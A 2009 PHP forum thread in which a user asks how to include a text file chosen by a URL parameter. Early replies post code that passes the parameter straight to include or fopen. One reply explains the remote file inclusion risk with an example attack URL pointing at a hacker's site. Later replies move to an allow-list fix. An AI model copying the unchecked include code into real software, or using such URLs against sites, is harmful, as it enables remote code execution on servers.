denoteone Posted April 21, 2009 Share Posted April 21, 2009 I want to inlcude a .txt file based on a varibale passed in the url and if that variable is not set in the url then show the default include file. This is what I have so far but I am pretty sure that I am not checking if it is set properly. The links could look like so. http://www.mysite.com?page=project1 this would include the txt file named project1.txt or http://www.mysite.com //this would show the default <?PHP if($_GET['page'] isset){ $page = $_GET['page'] . '.txt'; include $page; }else{ include 'default.txt'; } ?> Quote Link to comment Share on other sites More sharing options...
The Little Guy Posted April 21, 2009 Share Posted April 21, 2009 I would do it like so: <?php if(isset($_GET['page'])){ $page = $_GET['page'] . '.txt'; }else{ $page = 'default.txt'; } $handle = fopen($page, 'r'); $contents = fread($handle, filesize($page)); echo $contents ?> Quote Link to comment Share on other sites More sharing options...
denoteone Posted April 21, 2009 Author Share Posted April 21, 2009 Thanks Little Guy. Is there a reason behind not using "include" ? Hey love the avatar they make me smile too! Quote Link to comment Share on other sites More sharing options...
Seven_Rings Posted April 21, 2009 Share Posted April 21, 2009 The only thing you are doing wrong is the isset. Syntax is isset($var). This should be a working version of your code: <?php if(isset($_GET['page'])) { $page = $_GET['page'].'.txt'; include $page; } else { include 'default.txt'; } ?> Enjoy, -Seven_Rings Quote Link to comment Share on other sites More sharing options...
PFMaBiSmAd Posted April 21, 2009 Share Posted April 21, 2009 To avoid raw php code inclusion from a remote hacker's site, if you are going to include a file this way, either validate that $_GET['page'] only has very specific values in it that match your pages or check if the file $_GET['page'].'.txt' exists on your web server, or make sure that allow_url_include is off (php5.2.0 and higher), or make sure that allow_url_fopen is off (before php5.2.0.) Without these checks, someone can visit your page using http://www.mysite.com?page=http://hackers_site/project1 where he has a file project1.txt on his site that contains raw php code that will then get included and executed on your server. Quote Link to comment Share on other sites More sharing options...
Seven_Rings Posted April 21, 2009 Share Posted April 21, 2009 Very good advice PFMaBiSmAd. I was trying to be very straightforward, but I probably should have mentioned this. Thanks, -Seven_Rings Quote Link to comment Share on other sites More sharing options...
The Little Guy Posted April 21, 2009 Share Posted April 21, 2009 you probably would want to place all the txt files in a folder, then make it the "Root" include folder... so anything above that folder can not be accessed... Quote Link to comment Share on other sites More sharing options...
laffin Posted April 21, 2009 Share Posted April 21, 2009 Thanks Little Guy. Is there a reason behind not using "include" ? Hey love the avatar they make me smile too! I think the reason behind this, is because its not .php if it was .php, u can assum its html/php code in the file so include can process the code in the file fread/echo doesnt process the code. it just spits it out to the browser as is. and if its a php script, and ya name it .txt its a bad idea as than anyone can see the script, and look for ways of breaking the script I think u can replace the fread/echo with readfile instead Quote Link to comment Share on other sites More sharing options...
The Little Guy Posted April 21, 2009 Share Posted April 21, 2009 Thanks Little Guy. Is there a reason behind not using "include" ? Hey love the avatar they make me smile too! I think the reason behind this, is because its not .php if it was .php, u can assum its html/php code in the file so include can process the code in the file fread/echo doesnt process the code. it just spits it out to the browser as is. and if its a php script, and ya name it .txt its a bad idea as than anyone can see the script, and look for ways of breaking the script I think u can replace the fread/echo with readfile instead In my opinion allowing users to choose a file and execute it is a little more dangerous with include/require... Quote Link to comment Share on other sites More sharing options...
denoteone Posted April 23, 2009 Author Share Posted April 23, 2009 [quote]To avoid raw php code inclusion from a remote hacker's site, if you are going to include a file this way, either validate that $_GET['page'] only has very specific values in it[/quote] So if all my text files that I am including will only have a file name of 4 characters would the following code test work? if(isset($_GET['page'])) { $pagecount = strlen($page); if($pagecount > 4){ this is not a valid file }else{ $page = $_GET['page'].'.txt'; include $page; }else { include 'default.txt'; } [/code] Quote Link to comment Share on other sites More sharing options...
jonsjava Posted April 23, 2009 Share Posted April 23, 2009 this is a safer way than your method. This way, they can only choose a page that you have allowed explicitly: <?php $allowed_pages = array("project1", "main", "project2", "project3"); if (isset($_GET['page']) && in_array($_GET['page'], $allowed_pages)){ $page = $_GET['page'].".txt"; } else{ $page = "main.txt"; } include($page); ?> Quote Link to comment Share on other sites More sharing options...
denoteone Posted April 23, 2009 Author Share Posted April 23, 2009 Thanks! jonsjava and everyone else! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.